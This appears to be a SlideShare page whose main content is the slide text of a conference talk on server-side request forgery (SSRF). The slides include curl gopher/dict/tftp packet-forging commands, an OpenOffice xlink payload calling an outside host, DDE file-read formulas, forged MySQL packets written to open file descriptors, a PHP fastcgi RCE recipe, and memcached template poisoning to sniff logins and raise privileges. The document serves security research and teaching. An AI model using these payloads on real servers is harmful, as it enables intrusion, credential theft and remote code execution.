Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)Codemotion
 
PHP from soup to nuts Course Deck
PHP from soup to nuts Course DeckPHP from soup to nuts Course Deck
PHP from soup to nuts Course DeckrICh morrow
 
Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011Rich Bowen
 
Hogy jussunk ki lezárt hálózatokból?
Hogy jussunk ki lezárt hálózatokból?Hogy jussunk ki lezárt hálózatokból?
Hogy jussunk ki lezárt hálózatokból?hackersuli
 
FITC - Node.js 101
FITC - Node.js 101FITC - Node.js 101
FITC - Node.js 101Rami Sayar
 

Similaire à Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities (20)

Securing Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep SharmaSecuring Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep Sharma
 
Ingesting hdfs intosolrusingsparktrimmed
Ingesting hdfs intosolrusingsparktrimmedIngesting hdfs intosolrusingsparktrimmed
Ingesting hdfs intosolrusingsparktrimmed
 
Burp suite
Burp suiteBurp suite
Burp suite
 
PHP language presentation
PHP language presentationPHP language presentation
PHP language presentation
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoops
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
 
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
 
PHP from soup to nuts Course Deck
PHP from soup to nuts Course DeckPHP from soup to nuts Course Deck
PHP from soup to nuts Course Deck
 
Intro apache
Intro apacheIntro apache
Intro apache
 
Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011Apache Wizardry - Ohio Linux 2011
Apache Wizardry - Ohio Linux 2011
 
Php reports sumit
Php reports sumitPhp reports sumit
Php reports sumit
 
Php intro
Php introPhp intro
Php intro
 
Php intro
Php introPhp intro
Php intro
 
Php intro
Php introPhp intro
Php intro
 
Solr Recipes
Solr RecipesSolr Recipes
Solr Recipes
 
Web services tutorial
Web services tutorialWeb services tutorial
Web services tutorial
 
How do event loops work in Python?
How do event loops work in Python?How do event loops work in Python?
How do event loops work in Python?
 
Hogy jussunk ki lezárt hálózatokból?
Hogy jussunk ki lezárt hálózatokból?Hogy jussunk ki lezárt hálózatokból?
Hogy jussunk ki lezárt hálózatokból?
 
PHP ITCS 323
PHP ITCS 323PHP ITCS 323
PHP ITCS 323
 
FITC - Node.js 101
FITC - Node.js 101FITC - Node.js 101
FITC - Node.js 101
 

Plus de DefconRussia

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...DefconRussia
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...DefconRussia
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobindingDefconRussia
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/LinuxDefconRussia
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangDefconRussia
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC DefconRussia
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...DefconRussia
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринDefconRussia
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23DefconRussia
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20DefconRussia
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20DefconRussia
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20DefconRussia
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20DefconRussia
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23DefconRussia
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23DefconRussia
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23DefconRussia
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...DefconRussia
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхDefconRussia
 

Plus de DefconRussia (20)

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golang
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей Тюрин
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
 

Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities

  • 1. SSRF attacks and sockets: smorgasbord of vulnerabilities Vladimir Vorontsov, Alexander Golovko ONsec: web applications security
  • 2. Authors bio • Vladimir Vorontsov - security researcher, bug hunter awarded by Google/Yandex/ Adobe • Alexander Golovko - security researcher, Debian maintainer • Working together in ONsec company on web applications security
  • 3. A few words about modern web security Input validation Format processing External network access Internal network access
  • 4. Forge your protocol brands! • Make a request from a server • Attack internal network • Forge packets • Splitting/smuggling • Other protocols! • Universal ways such as gopher:// • Exploit anything ;)
  • 5. SSRF - new type of vulnerabilities? • We mean that SSRF is a generalized class of attacks • Introduced and used for convenience • Several vulnerabilities together or only one can lead to SSRF attacks • To vulns classification use CWE ;)
  • 6. Where can i find SSRF? • Export from remote files (like as «Upload from URL», «Export RSS feed») • POP3/IMAP/SMTP connections from webapps • File format processing (XML, docx, archives, etc) • Databases • Others ...
  • 7. Writing to socket in webapp code - bad way • Host/port filtering is strange on webapp level. Work for firewall and admins, right? • Protocol smuggling (CRLF and others) • What you mean when send in socket «GET / HTTP/1.1rnHost: domrnrn» ? • And what server mean when receive this?
  • 8. Using HTTP clients - bad way too • When you using HTTP clients such as cURL remember their features: • ! Unsafe redirect (http:// --> file://) • Various protocols support (gopher:// dict:// tftp:// rtsp:// ) • Maximum URL length is more than browsers value (100Mb URL is OK)
  • 9. Redirect tricks header("Location: ".$_GET['r']); • Bypass webapp filters i.e. preg_replace using redirect • any host -> localhost • valid port -> any port • valid schema -> any schema • SOP for browsers, not for HTTPClients
  • 10. Dict schema • http://tools.ietf.org/html/rfc2229 • curl dict://localhost:8000/GET / HTTP/1.1 • Receive on server: CLIENT libcurl 7.24.0 GET / HTTP/1.1 QUIT
  • 11. Gopher schema • http://www.ietf.org/rfc/rfc1436.txt • TCP packets with your content • Without r n t chars by RFC (and 00 for cURL). But all chars in LWP, Java, ASP.Net ;) • By Polyakov/Chastukhin [ERPscan] at BH_US_12 and CVE-2012-5085 (fixed now) • curl gopher://localhost:8000/2MyData # nc -vv -l -p 8000 listening on [any] 8000 ... connect to [127.0.0.1] from localhost [127.0.0.1] 64096 MyData
  • 12. Gopher schema • PHP doesn’t support gopher protocol! • Do not worry! PHP supports all vulnerabilities! • --with-curlwrappers provide gopher protocol in file_get_contents and others such as XXE
  • 13. TFTP schema • http://www.ietf.org/rfc/rfc1350.txt • UDP packets with your content (w/o 00 in cUrl) and 0x00 0x01 first bytes (really bad) • curl tftp://localhost:64/MyUdpPacketHere 02:11:21.378724 IP6 localhost.55928 > localhost.64: UDP, length 54 0x0000: 6000 0000 003e 1140 0000 0000 0000 0000 `....>.@........ 0x0010: 0000 0000 0000 0001 0000 0000 0000 0000 ................ 0x0020: 0000 0000 0000 0001 da78 2bcb 003e 0051 .........x+..>.Q 0x0030: 0001 4d79 5564 7050 6163 6b65 7448 6572 ..MyUdpPacketHer 0x0040: 6500 6f63 7465 7400 7473 697a 6500 3000 e.octet.tsize.0. 0x0050: 626c 6b73 697a 6500 3531 3200 7469 6d65 blksize.512.time 0x0060: 6f75 7400 3600 out.6.
  • 14. TFTP schema • Currently working on splitting datagrams to bypass 0x00 0x01 header in second packet • Without stable results now unfort ;(
  • 15. Various format processing issues • XML - External Entities, Signatures, WS etc (see http://erpscan.com/wp-content/uploads/ 2012/11/SSRF.2.0.poc_.pdf and http:// www.slideshare.net/d0znpp/onsec-phdays-2012- xxe-incapsulated-report) • OpenOffice products (Draw, Calc and others) • All soft which can open sockets (provide links to external files in file format) - all modern soft • others (see you at HITB 2013)
  • 16. OpenOffice - pretty good stuff • Universal solution to convert office documents • Common in Enterprise system and large portals • Many forks (Libre and others) • What happens while uploaded document is converted? • What about links to external files in the documents?
  • 17. OpenOffice - pretty good stuff for SSRF • RTFM http://docs.oasis-open.org/office/v1.2/ • Find all tags with xlink:href attribute • Do not forget about macros and applets (but really rare activated) • Exploit it! • <draw:image xlink:href="http://ololo.onsec.ru/? i’mSSRFed" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/>
  • 18. OpenOffice - pretty good stuff for SSRF • Formula for happiness • DDE is your friend • =DDE("soffice","file://i-want-to-read-this-file...) • Use simple formula to full path disclosure =CELL("filename") • Address links • A1='file:///etc/hosts'#$Sheet1.A1:B31 • B1=INDIRECT(A1)
  • 19. SSRF exploitation ways • Open new socket • Use already opened sockets/files (authorized) • Where can i find opened sockets/files?
  • 20. File descriptors: basics • Where does files in SSRF theme? • Data streams basics: sockets and files, etc • File descriptor - pointer to data stream • Each process have their own FD • dup, fork, exec - O_CLOEXEC • New data stream - new FD • Privileges while creating FD, not while access
  • 21. File descriptors: API • FD have minimum number by default (easy brute) • Access to already opened FDs: • PHP 5.3.3 <= 5.3.14 provide special wrapper fd:// to use FD simplest (later only on CLI mode) • Java: java.io.FileDescriptor • Perl: open AA, ‘>&2’; print AA ‘DataToFD’; • Python: os.open + os.write • Ruby: fd=IO.new(99,’w’);fd.write(‘ToFD-№99’); • Shell I/O redirection: $echo 123 > &2 • Privileges for chuid programs
  • 22. File descriptors: ProcFS • Special pseudo files system • Common in Linux, available in FreeBSD (not by default) • While opening /proc/<PID>/fd/<N> new datastream will be create with the same parameters (!not the same as FD API access to FD directly!) • You need together two FS privileges to access /proc • privileges on /proc/<PID>/fd/<N> • privileges on target file (!but not directories) • Examples: • RHEL /var/log/httpd/ - 0700, but access.log - 0644 • Debian before first rotate access.log - 0644, than 0640
  • 23. File descriptors: cases • Already opened FDs: • May be opened with privileges greater than current • In sockets case may be already authorized • Typical case: starting Apache: • open sockets to listen (80,443) by root • open error/access.logs by root • fork childs • chuid() to www-data for all forks • You may write to error/access.logs and sockets from child processes
  • 24. Stuff here: File descriptors: examples • Write a HTTP packet into opened FD to forge server output (to current client): fd6.write("HTTP 200 OKrnHost: localhostrn...");//also forge logs • Write a MySQL packet into opened FD to do SQL command: fd1.write("x22x00x00x00x03INSERT INTO aa VALUES(1,'fwrite')");
  • 25. Database connections pool • Pool is array of sockets with authorized sessions • Start when application server started and never close while app server working • May be many pools with different privileges (but not different for SSRF)
  • 26. PHP fastcgi SSRF RCE • Set php_admin_value, php_admin_ flag from Stuff here: frontend • Access to fastcgi over socket threw SSRF • run any file as PHP script • Set fastcgi headers in forged fastcgi packet and overwrite php_admin_value, php_value • allow_url_fopen + auto_prepend_file +data:// text/php,<?php phpinfo();?> = RCE • doesn’t work when php_admin_{value, flag} set in php fpm config
  • 28. Memcached SSRF: easy and very dangerously • Host-basic auth in general • TCP and UDP sockets by default • At the same host with webapp • Plain/text protocol (binary also available) • Does not close the socket after an improper request • Needed only n (0x0a) injection to do this
  • 29. Memcached SSRF: exploitation methodology • Collect all available keys • Sort keys by name, determine interesting • Find interesting data • Replace interesting data to arbitrary
  • 30. Memcached SSRF: inject sniffer • Find html/js/etc template of login page in memcached values • Insert your login/password JS/etc sniffer • Watch sniffer’s logs and get passwords ;) • Profit
  • 31. Memcached SSRF: dynamic templates RCE • Find template with interpreter’s code • Modify code to arbitrary • Call page with target template • Profit
  • 32. Memcached SSRF: escalate your privileges • Find session in memcached keys • Determine key which contain privileges flag of your current session (such as ‘Priv’) • Modify your access level to «superadmin» • You can also create a new «special» session with TTL 100 years if you want • Profit
  • 33. Format SSRF answer to read data (HTTP) • In many cases webapp logic provide reading only one output format (such as images or XML) • Use HTTP request smuggling to do this • One connection but many requests • If protocol support this, you get concatenated output • Try challenge http:// hackquest.zeronights.org/missions/ErsSma/
  • 34. Format SSRF answer to read data (HTTP) $f=fsockopen("localhost",80); fputs($f,"GET /$path HTTP/1.1rnHost: localhostrnrn"); HTTP/1.1 200 OK ... GET /1 HTTP/1.1 data 1 Host: localhost HTTP/1.1 200 OK GET /2 HTTP/1.1 ... Host: localhost data 2 GET /3 HTTP/1.1 HTTP/1.1 200 OK Host: localhost ... data3
  • 35. Format SSRF answer to read data (HTTP) GET /head HTTP/1.1 HTTP/1.1 200 OK Host: localhost ... <?xml version=‘1.0’?><root> GET /data HTTP/1.1 <![CDATA[ Host: localhost HTTP/1.1 200 OK GET /foot HTTP/1.1 ... Host: localhost i want to read this <secret>ololo</secret> while($s = fgets($f))         $resp.=$s; $resp=substr($resp,strpos($resp,"rnr HTTP/1.1 200 OK n")); $doc = new DOMDocument(); ... $doc->loadXML($resp); echo $doc->getElementsByTagName("root")- ]]></root> >item(0)->nodeValue;
  • 36. Format SSRF answer to read data (HTTP) • How to create header and footer as you want? • Range HTTP header is your friend • All web pages are your friends • Make a mosaic of pieces - server responses
  • 37. What about images? • Valid JPG with data which you want to read in EXIF • GIF header and your data at EOF • Inject data into image header which hold even after resize (http:// ax330d.blogspot.ru/2011/06/mosaic- of-attacks-from-image-upload.html) • PHP getimagesize() bypass (http:// lab.onsec.ru/2012/05/php-all- getimage-bypass.html)
  • 38. What about hosting centers? • TFTP server contain machine images • Machines get TFTP images until netboot • Attacker may get images from TFTP and get /etc/shadow and other staff
  • 39. What the next? • SSRF bible cheatsheet available now! • https://docs.google.com/document/d/ 1v1TkWZtrhzRLy0bYXBcdLUedXGb9njT NIJXa3u9akHM • Follow us: http://lab.onsec.ru [ENG] @d0znpp @ONsec_lab